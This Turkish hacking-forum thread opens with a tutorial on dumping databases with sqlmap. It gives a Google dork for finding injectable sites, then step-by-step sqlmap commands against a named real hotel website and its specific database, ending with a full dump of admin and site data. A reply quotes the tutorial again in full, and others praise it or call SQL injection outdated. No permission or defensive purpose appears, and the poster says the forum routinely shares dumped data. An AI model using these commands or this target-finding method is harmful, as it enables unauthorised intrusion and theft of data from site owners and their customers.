Database Dump//Sqlmap

[Extazİ]

Merhaba arkadaşlar bugün sqlmap ile nasıl data çekiliyor hangi adımlar izleniyor onu göstereceğim elimden geldiğince.

öncelikle nedir bu data dump etme işi forumumuzda da gördüğünüz gibi sürekli data dump paylaşıyoruz data dump etmenin bir çok yolu var manuel ve otomatik olarak dump ediliyor bende size windows üzerinden sqlmap kullanarak data dump etmeyi göstereceğim.
Bir tane sql injection zafiyeti bulunan siteye ihtiyacımız var bu siteleri bulmak için genellikle dorks kullanılır google dorks kullanarak bu tarz siteler bulabilirsiniz örnek inurl:.php?id= bu dorks sitelerin url kısmında .php?id= bulunan kısımlarını getirir siteyi bulduk daha sonra sqlmap'i açıyoruz

sqlmap -u "https://www.embryohotel.com/room-detail.php?id=1"

-u parametresi url'yi belirtir url'yi verdik entra bastık

sqlmap otomatik olarak saldırı yapıyor ve bize şu ekranı veriyor

burada bize hangi pyload ile bulduğunu sistemin version bilgilerin gösteriyor şimdi databese isimlerini öğrenelim

sqlmap -u "https://www.embryohotel.com/room-detail.php?id=1" --dbs

buradaa bize database isimlerini gösteriyor peki hangisi önemli bunların "information_schema" bu data tüm sitelerde olur bize "cp227754_embryohotel_db" datası önemli şimdi tables ve columnslarına bakalım

sqlmap -u "https://www.embryohotel.com/room-detail.php?id=1" -D cp227754_embryohotel_db --tables --columns

-D database ismi
tablesler

bize tablesleri ve columnsları gösterdi

şimdi dump edelim

sqlmap -u "https://www.embryohotel.com/room-detail.php?id=1" -D cp227754_embryohotel_db --dump

admin bilgileri siteye ait tüm datayı görebilirsiniz
çekilen datayı nereden bulacağız derseniz size sqlmap bitirince veriyor

bu kolay bir siteydi isteğe göre zor bir site de gelebilir tebrikler artık database dump edebilirsiniz.

 

[TaklaXBR]

Eline sağlık hocam, anlatım gayet sade ve anlaşılır olmuş. Yeni başlayan arkadaşların mantığı kavraması için güzel bir örnek. Devamını bekliyoruz.

 

[an0un]

Ellerinize sağlık hocam

 

[Daeky]

2-3 gün sonra 2026 a giricez hala sqlmap konuları bu forumda bitmedi
15 sene önceki web 2.0 da falanmı kaldık da bizmi bilmiyoruz ?
ne zaman şu tool mevzusu biticek hala anlamış değilim biraz globale örnek almamız lazım

moden webte zaten database private networkte public değil bu bahsettiğin 2005 için falan geçerli sql at db çek falan bugün DB sadece bir state deposundan birşeyden ibaret db aldım - sistem gitti mantığı geçti

bugün zaten ORM ve prepared statements artık default olarak kullanılıyor sql injection dediğimiz zafiyet adeta yaşayan ölü
hala daha bu zafiyete önlem alamayanda ne biliyim uğraşmasın daha iyi

Data Layer zaten günümüzde çokda önemli değil

konuyu web mimarisiyle application tarafından incelesen hadi eyvallah diyicem backend,server-side-app-db ilişkisinde nasıl çalışıyor arka tarafta vs..bu konuları anlatırsan daha iyi olur

eline sağlık

 

[Extazİ]

2-3 gün sonra 2026 a giricez hala sqlmap konuları bu forumda bitmedi
15 sene önceki web 2.0 da falanmı kaldık da bizmi bilmiyoruz ?
ne zaman şu tool mevzusu biticek hala anlamış değilim biraz globale örnek almamız lazım

moden webte zaten database private networkte public değil bu bahsettiğin 2005 için falan geçerli sql at db çek falan bugün DB sadece bir state deposundan birşeyden ibaret db aldım - sistem gitti mantığı geçti

bugün zaten ORM ve prepared statements artık default olarak kullanılıyor sql injection dediğimiz zafiyet adeta yaşayan ölü

Data Layer zaten günümüzde çokda önemli değil

konuyu web mimarisiyle application tarafından incelesen hadi eyvallah diyicem backend,server-side-app-db ilişkisinde nasıl çalışıyor arka tarafta vs..bu konuları anlatırsan daha iyi olur

eline sağlık

onları da analatacağız ama sqlmap halen eskisi gibi çalışıyor ve etkili bir konu yeni başlayanlar için güzel bir başlangıç toolu adama direkt en üst konuyu anlatamazsın temelden almalısın ki en üst konuyu anlatabilesin iyi günler yorum için teşekkürler

 

[Extazİ]

Ellerinize sağlık hocam

Eline sağlık hocam, anlatım gayet sade ve anlaşılır olmuş. Yeni başlayan arkadaşların mantığı kavraması için güzel bir örnek. Devamını bekliyoruz.

sağ olun

 

[xNewt]

Merhaba arkadaşlar bugün sqlmap ile nasıl data çekiliyor hangi adımlar izleniyor onu göstereceğim elimden geldiğince.

öncelikle nedir bu data dump etme işi forumumuzda da gördüğünüz gibi sürekli data dump paylaşıyoruz data dump etmenin bir çok yolu var manuel ve otomatik olarak dump ediliyor bende size windows üzerinden sqlmap kullanarak data dump etmeyi göstereceğim.
Bir tane sql injection zafiyeti bulunan siteye ihtiyacımız var bu siteleri bulmak için genellikle dorks kullanılır google dorks kullanarak bu tarz siteler bulabilirsiniz örnek inurl:.php?id= bu dorks sitelerin url kısmında .php?id= bulunan kısımlarını getirir siteyi bulduk daha sonra sqlmap'i açıyoruz

sqlmap -u "https://www.embryohotel.com/room-detail.php?id=1"

-u parametresi url'yi belirtir url'yi verdik entra bastık

sqlmap otomatik olarak saldırı yapıyor ve bize şu ekranı veriyor

burada bize hangi pyload ile bulduğunu sistemin version bilgilerin gösteriyor şimdi databese isimlerini öğrenelim

sqlmap -u "https://www.embryohotel.com/room-detail.php?id=1" --dbs

buradaa bize database isimlerini gösteriyor peki hangisi önemli bunların "information_schema" bu data tüm sitelerde olur bize "cp227754_embryohotel_db" datası önemli şimdi tables ve columnslarına bakalım

sqlmap -u "https://www.embryohotel.com/room-detail.php?id=1" -D cp227754_embryohotel_db --tables --columns

-D database ismi
tablesler

bize tablesleri ve columnsları gösterdi

şimdi dump edelim

sqlmap -u "https://www.embryohotel.com/room-detail.php?id=1" -D cp227754_embryohotel_db --dump

admin bilgileri siteye ait tüm datayı görebilirsiniz
çekilen datayı nereden bulacağız derseniz size sqlmap bitirince veriyor

bu kolay bir siteydi isteğe göre zor bir site de gelebilir tebrikler artık database dump edebilirsiniz.

elinize sağlık hocam başlangıç düzeyi için güzel